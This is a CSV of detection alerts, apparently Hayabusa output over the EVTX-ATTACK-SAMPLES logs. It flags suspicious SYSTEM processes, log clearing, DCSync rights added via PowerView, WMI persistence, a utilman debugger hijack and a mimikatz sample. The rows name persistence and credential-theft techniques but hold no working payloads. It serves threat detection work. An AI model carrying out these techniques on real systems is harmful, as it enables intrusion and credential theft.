2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,System log file was cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx
2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx
2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx
2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\user01\Desktop\WMIGhost.exe"" : Path: C:\Users\user01\Desktop\WMIGhost.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\scrcons.exe -Embedding : Path: C:\Windows\System32\wbem\scrcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:44.045 +09:00,IEWIN7,1,informational,Process Creation,"Command: sysmon -c sysmonconfig-18-apr-2019.xml : Path: C:\Users\IEUser\Desktop\Sysmon.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
